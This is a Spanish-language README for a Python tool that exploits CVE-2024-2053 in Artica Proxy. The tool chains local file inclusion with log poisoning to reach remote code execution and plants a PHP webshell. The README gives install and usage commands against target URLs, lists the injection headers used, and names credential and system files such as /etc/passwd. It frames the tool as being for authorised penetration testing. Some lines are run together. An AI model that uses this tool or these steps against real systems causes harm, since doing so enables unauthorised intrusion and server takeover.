
CVE-2024-2053
Este script en Python3 explota vulnerabilidades de Inclusión Local de Archivos (LFI) para lograr Ejecución Remota de Código (RCE) mediante técnicas de envenenamiento de registros. Diseñado específicamente para Artica Proxy (CVE-2024-2053) pero adaptable a otros escenarios LFI.
/etc/passwd, /proc/self/environ)git clone https://github.com/yourusername/artica-lfi-rce.git
cd artica-lfi-rce
pip3 install -r requirements.txtpython3 artica.py <url_objetivo> <endpoint> [opciones]Básico: python3 artica.py http://vulnerable.com /images.listener.php
Con proxy: python3 artica.py https://target.com:9000 /vuln.php -p http://127.0.0.1:8080
Modo detallado: python3 artica.py http://victim.com /endpoint.php -v
python3 artica.py /path.php --no-verify
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El desarrollador no asume ninguna responsabilidad y no se hace responsable de cualquier uso indebido o daño causado por este programa.
Licencia MIT - Derechos de autor (c) 2024
| Componente | Descripción |
|---|---|
| Payloads |
|
| Puntos de Inyección | User-Agent, Referer, Cookies, parámetros GET |
| Webshell | Nombre de archivo aleatorio (shell_[TIMESTAMP].php) |